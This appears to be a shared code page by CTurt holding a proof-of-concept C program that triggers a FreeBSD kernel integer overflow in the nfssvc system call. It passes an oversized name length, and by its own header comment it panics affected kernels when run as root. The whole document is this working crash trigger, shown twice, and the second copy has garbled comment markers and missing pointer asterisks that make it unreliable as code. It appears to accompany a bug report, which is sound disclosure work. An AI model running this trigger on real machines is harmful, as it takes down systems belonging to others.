CTurt · April 13, 2016 19:08
diff --git a/nfssvc.c b/nfssvc.c
 /*
 	PoC for FreeBSD kernel integer overflow in nfssvc system call
 	Refer to bug report here: https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206626
 	
 	System call only accessible as root.
 	
 	Running this test will panic affected versions of FreeBSD.
 	
 	clang nfssvc.c -o n
 	su
 	./n
 	
 	- CTurt
 */

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <errno.h>
 #include <sys/param.h>
 #include <sys/mount.h>
 #include <sys/time.h>
 #include <nfsserver/nfs.h>
 #include <unistd.h>

 #define	NFSID_INITIALIZE	0x0001

 #define	NFSSVC_IDNAME	0x00000200
 #define	NFSSVC_NEWSTRUCT	0x20000000

 struct nfsd_idargs {
 	int		nid_flag;	/* Flags (see below) */
 	uid_t		nid_uid;	/* user/group id */
 	gid_t		nid_gid;
 	int		nid_usermax;	/* Upper bound on user name cache */
 	int		nid_usertimeout;/* User name timeout (minutes) */
 	u_char		*nid_name;	/* Name */
 	int		nid_namelen;	/* and its length */
 	gid_t		*nid_grps;	/* and the list */
 	int		nid_ngroup;	/* Size of groups list */
 };

 int main(void) {
 	u_char *overflow = malloc(0x4000);
 	memset(overflow, 'a', 0x4000);
 	
 	struct nfsd_idargs nid;
 	
 	nid.nid_flag = NFSID_INITIALIZE;
 	nid.nid_name = overflow;
 	nid.nid_namelen = 0xfffffffe;
 	
 	printf("Triggering...\n");
 	
 	int result = nfssvc(NFSSVC_IDNAME | NFSSVC_NEWSTRUCT, &nid);
 	
 	printf("Result: %d\n", result);
 	printf("Errno: %d\n", errno);
 	
 	free(overflow);
 	
 	return 0;
 }
	/*
	PoC for FreeBSD kernel integer overflow in nfssvc system call
	Refer to bug report here: https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206626

	System call only accessible as root.

	Running this test will panic affected versions of FreeBSD.

	clang nfssvc.c -o n
	su
	./n

	- CTurt
	*/

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <errno.h>
	#include <sys/param.h>
	#include <sys/mount.h>
	#include <sys/time.h>
	#include <nfsserver/nfs.h>
	#include <unistd.h>

	#define NFSID_INITIALIZE 0x0001

	#define NFSSVC_IDNAME 0x00000200
	#define NFSSVC_NEWSTRUCT 0x20000000

	struct nfsd_idargs {
	int nid_flag; /* Flags (see below) */
	uid_t nid_uid; /* user/group id */
	gid_t nid_gid;
	int nid_usermax; /* Upper bound on user name cache */
	int nid_usertimeout;/* User name timeout (minutes) */
	u_char nid_name; / Name */
	int nid_namelen; /* and its length */
	gid_t nid_grps; / and the list */
	int nid_ngroup; /* Size of groups list */
	};

	int main(void) {
	u_char *overflow = malloc(0x4000);
	memset(overflow, 'a', 0x4000);

	struct nfsd_idargs nid;

	nid.nid_flag = NFSID_INITIALIZE;
	nid.nid_name = overflow;
	nid.nid_namelen = 0xfffffffe;

	printf("Triggering...\n");

	int result = nfssvc(NFSSVC_IDNAME \| NFSSVC_NEWSTRUCT, &nid);

	printf("Result: %d\n", result);
	printf("Errno: %d\n", errno);

	free(overflow);

	return 0;
	}